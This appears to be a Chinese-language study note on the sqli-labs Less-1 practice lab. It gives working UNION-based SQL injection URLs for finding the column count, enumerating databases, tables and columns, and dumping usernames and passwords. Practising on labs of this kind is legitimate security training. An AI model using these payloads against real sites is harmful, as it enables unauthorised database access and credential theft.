• url中#号无效,在url中使用%23代替#,或使用两个减号--代替注释,注意两个减号后常根一个加号+,被解析为空格,以注释掉后面的引号完成闭合

  • 字符串中所有字符都可以使用16进制输入(需要加0x)

  • 探测有多少列:localhost/sqli-labs-master/Less-1/?id=1' order by 2--+,通过order by来探测列数

  • 利用group_concat来在一行内显示多个信息

  • 探测union注入:localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, 3--+(3列)

  • 查询所有库名:select group_concat(schema_name) from information_schema.SCHEMATA
    example:localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, (select group_concat(schema_name) from information_schema.SCHEMATA)--+

  • 查询security库中所有表名:select group_concat(table_name) from information_schema.TABLES where table_schema = 'security'
    example:http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, (select group_concat(table_name) from information_schema.TABLES where table_schema = 'security')--+

  • 查询user表中所有列名:select group_concat(column_name) from information_schema.columns where table_name = 'users'
    example: http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, (select group_concat(column_name) from information_schema.columns where table_name = 'users')--+

  • 查询user表中信息:select group_concat(concat_ws('~', username,password)) from users(使用concat_ws()是为了分割数据,防止数据粘在一起)
    example:http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, (select group_concat(concat_ws('~', username,password)) from users)--+

sqli-labs第一关(MySql基础)相关推荐

  1. Mysql基础到进阶精品视频教程附讲义文档 91课

    课程介绍 Mysql基础 本章主要是php开发中Mysql基础知识的学习,包括MySQL的简单介绍和安装.MySQL管理工具的使用.表的建立.数据的查询.数据的修改和数据的增加等等,全面掌握php网站 ...

  2. Mysql 基础语法应用

    第一章 MySQL基础介绍 1.数据库的基本概念数据库: DataBase 简称 DB作用: 用于永久性存储和管理数据的仓库 2.常见的数据库A.MySQL 简单的免费的数据库 ---> 现在学 ...

  3. 第一阶段----MySQL学习----基础篇

    第一阶段----MySQL学习----基础篇 数据库-基础篇 MySql版本要求 基本语法 DQL语法 基本查询 条件查询 聚合函数 分组查询 排序查询 分页查询 语句练习 执行顺序 DCL-用户操作 ...

  4. MySQL基础_模糊查询—between and in is null <=>(安全等于)等关建字

    文章目录 MySQL基础_模糊查询-in关键字 MySQL基础_模糊查询-is null关键字 MySQL基础_[补充]安全等于的介绍 eg: select * from table where 字段 ...

  5. MySQL基础学习——第一篇

    目录 MySQL定义 MySQL的安装 MySQL打开 MySQL常用数据类型 一,数值类型 二,日期和时间类型 三,字符串类型 MySQL基础命令 一,关于库的内容 1,怎创建数据库 2,删除数据库 ...

  6. SQL注入之union联合注入——sql-lab第一关(非常非常详细的过程)

    SQL注入介绍 什么是SQL注入: SQL注入是(SQLi)是一种注入攻击,可以执行恶意的SQL语句,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器.攻击者 ...

  7. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  8. SQL注入之时间盲注 和 报错注入(sql-lab第一关为例)

    什么是时间盲注 时间盲注指通过页面执行的时间来判断数据内容的注入方式,通常用于数据(包含逻辑型)不能返回到页面中的场景,无法利用页面回显判断数据内容,只能通过执行的时间来获取数据. 时间盲注的过程 1 ...

  9. MySQL基础总结(一)

    MySQL基础总结(一) 文章目录 MySQL基础总结(一) 一.MySQL架构 1.MySQL架构图 2.SQL语句在MySQL中的执行流程 二.存储引擎 1.查看存储引擎 2.设置存储引擎 3.存 ...

最新文章

  1. 伍迷创意随想集 之 网游与旅游结合新玩法
  2. python dict 字典 清空
  3. TensorFlow 相关 URL
  4. 断网python第三方库安装_断网环境下利用pip安装Python离线安装包(转载)
  5. AI到底有多吃香?推荐一个斯坦福、CMU、清北学生都在上的AI课
  6. linux 打开网页 用curl_linux终端模拟浏览器访问(curl)
  7. 锁是网络数据库中的一个非常重要的概念
  8. 企业如何杜绝云端数据泄密?
  9. python复制sheet_python excel sheet复制
  10. Command 和 Active Object 模式
  11. atitit.eclipse 新特性总结3.1--4.3
  12. 使用npm和命令行强制删除文件
  13. CVPR2021 视频目标检测论文推荐
  14. 精心打造中国第一个商用3G网络
  15. 微信文章临时链接变永久链接
  16. iphone12绿色好看 iphone12系列哪个颜色好看
  17. 推荐一款技术人必备的接口测试神器:Apifox
  18. Project Professional安装:Windows Installer(MSI)与即点即用
  19. 区块链共识算法(4)分布式一致性算法Paxos
  20. 【我的书】Unity Shader的书 — 文件夹(2015.12.21更新)

热门文章

  1. 五一假期将至,机房维护工作要做好
  2. 压缩机电流保护原因是什么?压缩机烧毁常见原因有哪些?
  3. 数据中心机房供电需求有哪些?存在哪些电能质量问题?
  4. 网络运维工作是什么的?
  5. python中变量名有哪些_Python变量范围有哪些?如何在Python中定义变量?
  6. AI:2020年6月23日北京智源大会演讲分享之智能信息检索与挖掘专题论坛——09:55-10:40刘欢教授《Challenges in Combating Disinformation》
  7. Algorithm:C++语言实现之链表相关算法(单链公共结点问题、一般LCA、括号匹配、最长括号匹配、逆波兰表达式Reverse Polish Notation、直方图矩形面积、收集雨水问题)
  8. Sql:成功解决将sql输出的datetime时间格式转为常规格式
  9. 将js进行到底:node学习10
  10. asp.net 二级域名(路由方式实现)